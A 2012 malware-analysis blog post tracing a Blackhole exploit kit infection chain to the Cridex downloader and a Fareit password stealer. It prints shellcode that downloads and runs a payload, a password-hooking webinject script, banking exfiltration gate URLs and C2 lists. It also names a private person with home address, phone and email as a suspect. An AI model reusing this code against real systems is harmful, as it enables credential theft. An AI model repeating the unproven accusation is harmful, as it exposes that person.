I was posting this findings scattered in twitters, VirusTotal, KernelMode (thank's - to @Xylit0l for the invitation), so is time to make it together.. And I'm advising you to make documentation is 1,000 times more important, it sucks, time consuming, yet a perfect strategy to fight these moronz.Started from a spam lead to redirector page, lead usto Blackhole(v2.01) landing page, below is the sites:
//Redirector: h00p://abyssinianflights.com/components/com_ag_google_analytics2/alert-service-citi-sign_in.html BHEK Landing Page: h00p://eaglepointecondo.biz/detects/operation_alert_login.phpHere's the pastes of above data: Redirector-->>[PASTEBIN], LandingPage-->>[PASTEBIN], PulginDetectBHEK2-->>[PASTEBIN] The landing page was having 302 protector for bad parameters:HTTP request sent, awaiting response... 302 Found Location: h00p://citibank.com [following] --20:24:05-- h00p://citibank.com/ => `index.html' Resolving citibank.com... 192.193.103.222, 192.193.219.58 Connecting to citibank.com|192.193.103.222|:80... connected. HTTP request sent, awaiting response... 301 Moved Permanently Location: h00ps://online.citibank.com/US/Welcome.c [following] h00ps://online.citibank.com/US/Welcome.c: Unsupported scheme.I went straight wacking the shellcode, by recoding it into:var a = "8282!%5185!%64c4!%44e0!%0551!%e004!%9134!...(copy-paste those moronz - code here friends)..%1414!%".split("").reverse().join(""); x = a["replace"](/\%!/g, "%" + "u") document.write(x);This will burp you the shellcode... result is as below in bins..41 41 41 41 66 83 e4 fc fc eb 10 58 31 c9 66 81 AAAAf......X1.f. e9 fe fd 80 30 28 40 e2 fa eb 05 e8 eb ff ff ff ....0(@......... ad cc 5d 1c c1 77 1b e8 4c a3 68 18 a3 68 24 a3 ..]..w..L.h..h$. 58 34 7e a3 5e 20 1b f3 4e a3 76 14 2b 5c 1b 04 X4~.^...N.v.+\.. a9 c6 3d 38 d7 d7 90 a3 68 18 eb 6e 11 2e 5d d3 ..=8....h..n..]. : : : 4d 4b 5c 5b 07 47 58 4d 5a 49 5c 41 47 46 77 49 MK\[.GXMZI\AGFwI 44 4d 5a 5c 77 44 47 4f 41 46 06 58 40 58 17 47 DMZ\wDGOAF.X@X.G 4e 15 1b 18 12 19 46 12 19 41 12 19 41 12 1b 1b N.....F..A..A... 0e 51 4d 15 19 45 12 19 4f 12 19 4e 12 19 42 12 .QM..E..O..N..B. 19 45 12 19 43 12 1b 18 12 19 43 12 1b 1b 12 19 .E..C.....C..... 47 0e 4f 15 19 43 0e 40 50 15 44 0e 46 4c 15 58 G.O..C.@P.D.FL.X 28 28 ((Use your shellcode cracker tools or emulator libs to dis-assembly API:0x7c801ad9 kernel32.VirtualProtect(lpAddress=0x4020cf, dwSize=255) 0x7c801d7b kernel32.LoadLibraryA(lpFileName=urlmon) 0x7c835dfa kernel32.GetTempPathA(lpBuffer=0x22fc60, nBufferLength=248, [lpBuffer=C:\DOCUME~1\Administrator\LOCALS~1\Temp\]) 0x1a494bbe urlmon.URLDownloadToFileA(pCaller=0, szURL=h00p://eaglepointecondo.biz/detects/operation_alert_login.php?of=30:1n:1i:1i:33&ye=1m:1g:1f:1j:1m:1k:30:1k:33:1o&g=1k&hx=l&nd=p, lpfnCB=0x0, szFileName=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll) 0x7c86250d kernel32.WinExec(lpCmdLine=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0) 0x7c86250d kernel32.WinExec(lpCmdLine=regsvr32 -s C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0) 0x7c81cb3b kernel32.TerminateThread(dwExitCode=0)We'll get the payload download url below:h00p://eaglepointecondo.biz/detects/operation_alert_login.php?of=30:1n:1i:1i:33&ye=1m:1g:1f:1j:1m:1k:30:1k:33:1o&g=1k&hx=l&nd=pI like to see what server side of BHEK replied during download://my header GET /detects/operation_alert_login.php?of=30:1n:1i:1i:33&%20ye=1m:1g:1f:1j:1m:1k:30:1k:33:1o&g=1k&hx=l&nd=p HTTP/1.1 Referer: h00p://eaglepointecondo.biz/detects/operation_alert_login.php User-Agent: MalwareMustDie painted logo in your EK doors Accept: */* Host: eaglepointecondo.biz Connection: Keep-Alive //replies: HTTP/1.1 200 OK Server: nginx/1.3.3 Date: Sat, 15 Dec 2012 11:01:05 GMT Content-Type: application/x-msdownload Content-Length: 135168 Connection: close X-Powered-By: PHP/5.3.14 Pragma: public Expires: Sat, 15 Dec 2012 11:01:04 GMT Cache-Control: must-revalidate, post-check=0, pre-check=0 Cache-Control: private Content-Disposition: attachment; filename="info.exe" Content-Transfer-Encoding: binaryHere's what the mess looks like: I was tired so I tried to check it in some online tools, got no satisfactory result thus VirusTotal looks having problem uploading... so I used my last energy to check it myself, as per below video: This time I'll leave the binary analysis to you, you can use - my previous post as guidance, PS: the binaries are all encrypted, de-encrypt - them will be a good idea! (I will add the binary analysis later on..) I go straight to the behavior test below, to capture & expose this infection: The cridex trojan, if is executed it will be like this: This program will self-copied/drops itself to:%AppData% KB000777165.exe //which is actually the same file...With the copy API below:CopyFileW(lpExistingFileName: "C:\TEST\info.exe", lpNewFileName: "C:\Documents and Settings\User\Application Data\KB00085031.exe", bFailIfExists: 0x0)Here's the proof: A self execution trace with below API(CMD) found:lpCmdLine=C:\Documents and Settings\User\Application Data\KB00085031.exe, uCmdShow=0It runs like this: Found interesting strings in that binary: At this point we captured the huge binary saved after HTTP/POST sent:POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US) Host: 74.207.237.170:8080 Content-Length: 347 Connection: Keep-Alive Cache-Control: no-cache ......dU..ZP....Y.yy..|4$R.".....u...+T..1L.;I.n6v39.+.. DP.....O@xt,U..V|............c1..4~: R.E.........K.:+.....Z`.. y.....e.z...B.....^...bG..B.opBx0E\ .....B..N.]....g.^......59.L.l.M.....>q)..Q...\5..p...M..q... W-.*...u.P.\p......2.K..HM7..~Z?vX.p.W..0.m....A?.u....=|<.\.' .......5._7'..46..G\.o" ....}...E..K...2eE..,.U.=.C....KtU.... u..2.~@ // With the encryption reply long binary data... Server: nginx/1.0.10 Date: Sat, 15 Dec 2012 09:58:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/5.3.18-1~dotdeb.0 Vary: Accept-Encoding f3b .}.%..k..o.-..U...........C..8.C.0...o...E.d... snip 2U...`......p_| ]X.$...B..A.F....}.snip .@C...4*j..|.\..%..xv-.....snip .1..x.....2.....`3....3.1..7......M.k..r-5s.8P=snip z.nT^MV..{+=3ym........Gj.3JV....x..xe{@.......snip [.UK.un2.>.W`..{.9'+.7*f..v.................F.M.snip v....[...M.O.......P2.....;..a\..^..Rv&..9P...xsnip : :snip : .%......8{..6...J..$:?..E.+..C"...V'uZ1M..$Cy6}.1snip 3.!.i~..N.a..;^..+..a..[..J.~...7}....W...q.rR..n(."snip .<p....N....,..v......R...d..U_...?....k...-.....E%.snip ...a.AZ$......H...7r......And then found the below file was created in the %Temp%FileName: exp2.tmp.exe TimeStamp: 2012/12/15 18:58 122,880 MD5 ce7474646297ed818bb8ed48f50c7e1eThe file looks like this: And THEN...the new process of exp2.tmp.exe started: Up to this point we know that KB00085031.exe downloads exp2.tmp.exe. Currently, in the registry was only one key was added. Is an autostart- for the KB00085031.exe :HKU\S-1-5-21-1214440339-926492609-1644491937-1003 \Software\Microsoft\Windows\CurrentVersion\Run\KB00777165.exe: ""C:\Documents and Settings\%%UserName\Application Data\KB00777165.exe""Network activity
At this points, exp2.tmp.exe was making a hell of connection, I recorded in wireshark as per summary below, full data is here --->>[PASTEBIN](323): try to connect to 132.248.49.112 (335): DNS requests to... 112.49.248.132.in-addr.arpa web.ecologia.unam.mx 77.65.130.113.in-addr.arpa ns.shinbiro.com..domain (360): Communicating via HTTP/POST to 203.113.98.131:80 (385): ***** At this point the malware process exp2.tmp.exe was started.... (394): try to establish conn to 74.207.237.170 (399): send ping to 209.190.61.50 (405): Communicating via HTTP/POST to 174.143.174.136:8080 (461): try to establish conn to 199.71.215.194 (467): Communicating via HTTP/POST to 210.56.23.100:8080 (495): try to establish conn to 132.248.49.112 (500): try to establish conn to 74.117.61.66 (535): try to establish conn to 173.192.229.36 (541): Communicating via HTTP/POST to 69.64.89.82:8080 (571): try to establish conn to: 173.224.221.135 (577): try to estacblish conn to: 59.90.221.6 (583): try to establish to 180.235.150.72 (588): Communicating via HTTP/POST to 123.49.61.59:8080 (641): Communicating via HTTP/POST to 123.49.61.59:8080 (716): try to establish conn to 113.130.65.77 (721): try to establish conn to 180.235.150.72 (726): Communicating via HTTP/POST to 69.64.89.82:8080Mr. EP_X0FF the Global Moderator of KernelInfo was cracking the code to find the all connection possibilitty as below:hxxp://123.49.61.59:8080 hxxp://180.235.150.72:8080 hxxp://59.90.221.6:8080 hxxp://173.224.221.135:8080 hxxp://210.56.23.100:8080 hxxp://199.71.215.194:8080 hxxp://74.117.61.66:8080 hxxp://209.51.221.247:8080 hxxp://174.143.174.136:8080 hxxp://74.207.237.170:8080 hxxp://203.217.147.52:8080 hxxp://208.87.243.18:8080 hxxp://206.176.226.157:8080With the below list of callbacks:hxxp://132.248.49.112:8080/asp/intro.php hxxp://113.130.65.77:8080/asp/intro.php hxxp://203.113.98.131:8080/asp/intro.php hxxp://110.164.58.250:8080/asp/intro.php hxxp://200.108.18.158:8080/asp/intro.php hxxp://207.182.144.115:8080/asp/intro.php hxxp://148.208.216.70:8080/asp/intro.php hxxp://203.172.252.26:8080/asp/intro.php hxxp://202.6.120.103:8080/asp/intro.php hxxp://203.146.208.180:8080/asp/intro.php hxxp://207.126.57.208:8080/asp/intro.php hxxp://203.80.16.81:8080/asp/intro.php hxxp://202.180.221.186:8080/asp/intro.phpFile activity
The exp2.tmp.exe at the first runs making your PC so slow, because it search every path possible for the data to steal, VirusTotal is making good behavior file access list here-->>[PASTEBIN] Snipped here:\\.\PIPE\lsarpc (successful) C:\DOCUME~1\~1\LOCALS~1\Temp\HWID (failed) C:\WINDOWS\wcx_ftp.ini (failed) C:\Documents and Settings\ \wcx_ftp.ini (failed) C:\Documents and Settings\ \Application Data\GHISLER\wcx_ftp.ini (failed) C:\Documents and Settings\All Users\Application Data\GHISLER\wcx_ftp.ini (failed) C:\Documents and Settings\ \Local Settings\Application Data\GHISLER\wcx_ftp.ini (failed) C:\Documents and Settings\ \Application Data\GlobalSCAPE\CuteFTP\sm.dat (failed) C:\Documents and Settings\ \Application Data\GlobalSCAPE\CuteFTP Pro\sm.dat (failed) C:\Documents and Settings\ \Application Data\GlobalSCAPE\CuteFTP Lite\sm.dat (failed) The Password Stealer Configurator
At this point in your registry at the below key:HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows NT\SD5809E24(←random)\:Was saved a long strings like this:3C 73 65 74 74 69 6E 67 73 20 68 61 73 68 3D 22 39 34 38 62 33 33 30 31 35 38 63 61 66 64 39 37 36 31 39 64 39 38 35 31 39 66 39 66 64 38 61 66 61 64 39 34 62 37 64 38 22 3E 3C 68 74 74 70 73 68 6F 74 73 3E 3C 75 72 6C 20 74 79 70 65 3D 22 64 65 6E 79 22 3E 5C 2E 28 63 73 73 7C 6A 73 29 28 24 7C 5C 3F 29 3C 2F 75 72 6C 3E 3C 75 72 6C 20 63 6F 6E 74 65 6E 74 54 79 70 65 3D 22 5E 74 65 78 74 2F 28 68 74 6D 6C 7C 70 6C 61 69 6E 29 22 3E 5C 2E 63 6F 6D 2F 6B 31 2F 3C 2F 75 72 6C 3E 3C 75 72 6C 20 63 6F 6E 74 65 6E 74 54 79 70 65 3D 22 5E 74 65 78 74 2F 28 68 74 6D 6C 7C 70 6C 61 69 6E 29 22 3E 2F 61 63 68 2F 3C 2F 75 72 6C 3E 3C 75 72 6C 20 63 6F 6E 74 65 6E 74 54 79 70 65 3D 22 5E 74 65 78 74 2F 28 68 74 6D 6C 7C 70 6C 61 69 6E 29 22 3E 2F 61 75 74 68 65 6E 74 69 63 61 74 69 6F 6E 2F 7A 62 66 : 6F 64 79 2E 2A 3F 3E 28 2E 2A 3F 29 5D 5D 3E 3C 2F 70 61 74 74 65 72 6E 3E 3C 72 65 70 6C 61 63 65 6D 65 6E 74 3E 3C 21 5B 43 44 41 54 41 5B 3C 73 63 72 69 70 74 20 74 79 70 65 3D 22 74 65 78 74 2F 6A 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3D 22 68 74 74 70 3A 2F 2F 37 38 2E 31 35 39 2E 31 32 31 2E 31 32 38 3A 38 30 38 30 2F 69 70 63 6B 67 2F 67 61 74 65 2E 70 68 70 3F 62 6F 74 69 64 3D 52 49 4B 2D 31 33 37 39 43 46 33 37 43 32 35 5F 39 34 35 35 45 35 30 44 30 42 32 44 32 30 43 42 26 62 61 6E 6B 3D 62 61 6E 6B 6F 66 61 6D 65 72 69 63 61 22 3E 3C 2F 73 63 72 69 70 74 3E 5D 5D 3E 3C 2F 72 65 70 6C 61 63 65 6D 65 6E 74 3E 3C 2F 6D 6F 64 69 66 79 3E 3C 2F 61 63 74 69 6F 6E 73 3E 3C 2F 68 74 74 70 69 6E 6A 65 63 74 3E 3C 2F 68 74 74 70 69 6E 6A 65 63 74 73 3E 3C 2F 73 65 74 74 69 6E 67 73 3ESave that↑as binary with the TXT filename & you'll see this malware config in text, you'll see the bank/case online sites with each connection with the credential path also some public https or ftp online. I saved the data in here-->>[PASTEBIN] Thank's again to Mr. EP_X0FF the Global Moderator of KernelInfo who mentioned all of the software & path of credentials seeked here-->>[PASTEBIN] I counted 491 type of credentials was seeked.. Back to the this stealer configuration file, it has encryption before sent by POST method:if(typeof window.EncryptPassword=='function') {var fn=window.EncryptPassword;window.EncryptPassword=function(id) { try{var e=document.getElementById(id); var i=document.createElement("input"); i.type="hidden"; i.name="OPN"; i.value=e.value; document.Form1.appendChild(i);} catch(e){}return fn(id);};}There is also phishing for the credit card/online banking trap, the code is in stealer configuration, something like this snips:: <span class="bodytext"> Click "Next" to complete Identity verification process. </span> <!-- END of art_SA_edu_edu_instr in DCTM ECP --> </td> </tr> <tr> <td colspan="2"> </td> </tr> <tr> <td> </td> <td> <span class="bodytext"> <label title="Go to Enter Card"> </label> </span> </td> </tr> <tr> <td colspan="2"> </td> :I just save the configuration data into html & run it as PoC, saved it as this teststealer.html: See the path & filename well..Then here we go... Hello American Express! Good Day Chase Bank! In what I confimred in configuration code, it sends stolen credential into:h00p://78.159.121.128:8080/ipckg/gate.php?botid=-YOUR-PC-ID-&bank=chase h00p://78.159.121.128:8080/ipckg/gate.php?botid=-YOUR-PC-ID-&bank=wellsfargo h00p://78.159.121.128:8080/ipckg/gate.php?botid=-YOUR-PC-ID-&bank=bankofamericaVirus Total Detection Ratio
It's been 24hrs more since I detected these messes, after 1st disclosure in- here and there let's see the detection ratio of these infectors below: The landing page:SHA1: 35d9f1481132d8f1abdc1b2d3aa56cd1455f6656 MD5: a93bb29d6a3c3c04b1cb3dafc7cfc79f File size: 90.1 KB ( 92310 bytes ) File name: operation_alert_login.php File type: HTML Detection ratio:6 / 46 Analysis date: 2012-12-16 06:22:39 UTC ( 1 分 ago ) URL -->>[CLICK] MalwareName: McAfee-GW-Edition : JS/Exploit-Blacole.gq NANO-Antivirus : Trojan.Script.Expack.bcrxpa McAfee : JS/Exploit-Blacole.gq Fortinet : JS/Obfuscus.AACB!tr TheHacker : JS/Feebs.gen@MM AVG : JS/RedirThe Cridex trojan of password stealer downloader:SHA1: d4bfbbd375da0ac775812bed2459ff908e1fb9ba MD5: b360fec7652688dc9215fd366530d40c File size: 132.0 KB ( 135168 bytes ) File name: info.exe File type: Win32 EXE Tags: peexe Detection ratio: 26 / 45 Analysis date: 2012-12-16 01:28:28 UTC ( 5 時間, 5 分 ago ) URL -->>[CLICK] MalwareName: MicroWorld-eScan : Trojan.Generic.KD.810285 McAfee : pws-ja!cm Malwarebytes : Trojan.FakeMS Symantec : W32.Cridex Norman : W32/Suspicious_Gen4.BTZMQ ESET-NOD32 : a variant of Win32/Kryptik.AQNJ TrendMicro-HouseCall : TROJ_GEN.RCBCDLE Avast : Win32:Dropper-MEA [Drp] Kaspersky : Trojan.Win32.Bublik.wad BitDefender : Trojan.Generic.KD.810285 Emsisoft : Trojan.Win32.Agent.AMN (A) Comodo : TrojWare.Win32.Trojan.Agent.Gen F-Secure : Trojan.Generic.KD.810285 DrWeb : Trojan.Necurs.97 VIPRE : Win32.Malware!Drop AntiVir : TR/Bublik.wad McAfee-GW-Edition : pws-ja!cm Sophos : Troj/Agent-ZIT Microsoft : Worm:Win32/Cridex.E ViRobot : Trojan.Win32.A.Bublik.135168.S GData : Trojan.Generic.KD.810285 PCTools : Malware.Cridex Ikarus : Trojan-Spy.Agent Fortinet : W32/Bublik.WAD!tr AVG : Generic30.BIMO Panda : Trj/Sinowal.WWGThe password stealer (fareit) trojan:SHA1: 88bab6d7c0e98b1ee55110243251f562af399854 MD5: ce7474646297ed818bb8ed48f50c7e1e File size: 120.0 KB ( 122880 bytes ) File name: exp2.tmp.ex_ File type: Win32 EXE Tags: peexe Detection ratio: 7 / 46 Analysis date: 2012-12-16 01:13:52 UTC ( 5 時間, 6 分 ago ) URL -->>[CLICK] MalwareName: DrWeb : Trojan.PWS.Stealer.1656 VIPRE : Trojan.Win32.Kryptik.alry (v) Emsisoft : Trojan.PSW.Win32.Tepfer.dazd.AMN (A) Kaspersky : Trojan-PSW.Win32.Tepfer.dazd Malwarebytes : Trojan.PWS Kingsoft : Win32.Malware.Generic.a.(kcloud) ViRobot : Trojan.Win32.A.PSW-Tepfer.122880.AWe can see that the landing page & password stealer (Fareit) STILL has low detection.Samples
For the good guys, the samples & captures data avilable. Samples --->>[HERE] Research Data(PCAP, RegShot) -->>[HERE] Cracked Data (deobfs'ed code, decrypt binaries(thanks to kernelmode!)etc) -->>[HERE]Thank's to...
To all MalwareMustDie friends! Without you guys, I won't do this far :-) Blake (jsunpack, for inspiring the stealer configuration file. @Xylit0l & EP_X0FF of kernelmode, great thank's! YouTube, VirusTotal, MediaFire, Google & BloggerNetwork Analysis..Tracing the Bad guys..
As per requested, I investigated the NS used, leads to someone.. Please bear my text since I posted via FreeBSD below://The domain used for the infector is eaglepointecondo.biz 900 IN A 59.57.247.185 // ↑This is aiming US for sure (see the bank list, 75% are US banks) // The SOA that was used (mark the TTL refresh time..) primary name server = ns1.amishshoppe.net responsible mail addr = (root) serial = 1355645102 refresh = 60 (1 min) retry = 120 (2 mins) expire = 1048576 (12 days 3 hours 16 mins 16 secs) default TTL = 900 (15 mins) //←this! //How it was root'ed: Tracing to eaglepointecondo.biz[a] via 202.238.95.24, maximum of 1 retries 202.238.95.24 (202.238.95.24) |\___ a.gtld.biz [biz] (156.154.124.65) | |\___ NS1.AMISHSHOPPE.NET [eaglepointecondo.biz] (209.140.18.37) Got authoritative answer | \___ NS2.AMISHSHOPPE.NET [eaglepointecondo.biz] (211.27.42.138) * |\___ k.gtld.biz [biz] (156.154.128.65) | |\___ NS2.AMISHSHOPPE.NET [eaglepointecondo.biz] (211.27.42.138) * | \___ NS1.AMISHSHOPPE.NET [eaglepointecondo.biz] (209.140.18.37) Got authoritative answer |\___ f.gtld.biz [biz] (209.173.58.66) | |\___ NS2.AMISHSHOPPE.NET [eaglepointecondo.biz] (211.27.42.138) * | \___ NS1.AMISHSHOPPE.NET [eaglepointecondo.biz] (209.140.18.37) Got authoritative answer |\___ c.gtld.biz [biz] (156.154.127.65) | |\___ NS1.AMISHSHOPPE.NET [eaglepointecondo.biz] (209.140.18.37) Got authoritative answer | \___ NS2.AMISHSHOPPE.NET [eaglepointecondo.biz] (211.27.42.138) * |\___ b.gtld.biz [biz] (156.154.125.65) | |\___ NS1.AMISHSHOPPE.NET [eaglepointecondo.biz] (209.140.18.37) Got authoritative answer | \___ NS2.AMISHSHOPPE.NET [eaglepointecondo.biz] (211.27.42.138) * \___ e.gtld.biz [biz] (156.154.126.65) |\___ NS1.AMISHSHOPPE.NET [eaglepointecondo.biz] (209.140.18.37) Got authoritative answer \___ NS2.AMISHSHOPPE.NET [eaglepointecondo.biz] (211.27.42.138) * //History of infector from 59.57.247.185 leaeds to: eaglepointecondo.org A 59.57.247.185 pleansantwille.com A 59.57.247.185 eaglepointecondo.co A 59.57.247.185 platinumbristol.net A 59.57.247.185 eaglepointecondo.biz A 59.57.247.185 sessionid0147239047829578349578239077.pl A 59.57.247.185 //It uses Chinese IP: ASN |Prefix | ASName |CN |Domain |ISP of an IP Address 4134 | 59.56.0.0/14 | CHINANET | CN | XMJL.COM | XIAMEN JINLONGLVXINGCHE FUJIAN PROVINCE //PoC of this IP infection as additional evidence: http://urlquery.net/search.php?q=59.57.247.185&type=string&start=2012-12-01&end=2012-12-16&max=300 // These moronz is using the DNS below: ns1.amishshoppe.net. 3600 IN A 209.140.18.37 ns2.amishshoppe.net. 3600 IN A 211.27.42.138 // Those DNS Server are in US & Australia (should report this malicious use..) ASN |Prefix | ASName | CN | Domain | ISP of an IP Address 11042 | 209.140.16.0/22 | LANDIS-HOLDINGS-INC | US | NOCDIRECT.COM | LANDIS HOLDINGS INC 9443 | 211.27.32.0/20 | INTERNETPRIMUS-AS | AU | PRIMUSTEL.COM | PRIMUS TELECOMMUNICATIONS //Looks they should got full control on domain amishshoppe.net to control DNS: PoC: ; <<>> DiG 9.8.1-P1 <<>> 209.140.18.37 axfr // Voila! no AXFR allowed means NS ust be added directly. ;; global options: +cmd ; Transfer failed. ; <<>> DiG 9.8.1-P1 <<>> 211.27.42.138 axfr ;; global options: +cmd ; Transfer failed. //This infector in WHOIS: Domain Name: EAGLEPOINTECONDO.BIZ Domain ID: D52418387-BIZ Sponsoring Registrar: GODADDY.COM, INC. Name Server: NS1.AMISHSHOPPE.NET Name Server: NS2.AMISHSHOPPE.NET Created by Registrar: GODADDY.COM, INC. Last Updated by Registrar: GODADDY.COM, INC. Domain Registration Date: Sat Dec 08 00:22:13 GMT 2012 Domain Expiration Date: Sat Dec 07 23:59:59 GMT 2013 Domain Last Updated Date: Mon Dec 10 19:12:41 GMT 2012 //VIA Strange proxy services.... Registrant Organization: Domains By Proxy, LLC Registrant Address1: DomainsByProxy.com Registrant Address2: 14747 N Northsight Blvd Suite 111, PMB 309 Registrant City: Scottsdale Registrant State/Province: Arizona Registrant Postal Code: 85260 Registrant Country: United States Registrant Country Code: US Registrant Phone Number: +1.4806242599 Registrant Facsimile Number: +1.4806242598 // some must start questioning Mr. Steve Burandt in US about this infection... Domain Name: AMISHSHOPPE.NET Registrar: REGISTER.COM, INC. Whois Server: whois.register.com Referral URL: http://www.register.com Name Server: NS1.AMISHSHOPPE.NET Name Server: NS2.AMISHSHOPPE.NET Status: clientTransferProhibited Updated Date: 15-nov-2012 // <== JUST UPDATED!! #PoC Proved!! #w00t! Creation Date: 15-nov-2012 Expiration Date: 15-nov-2013 Registrant: Steve Burandt 0n430 Peter Rd Winfield, IL 60190 US Phone: +1.6304626711 Email: solaradvent@yahoo.com↑Strong accusation, I know, but the data said so.. Can't wait to hear the explanation from this person..
#MalwareMustDie!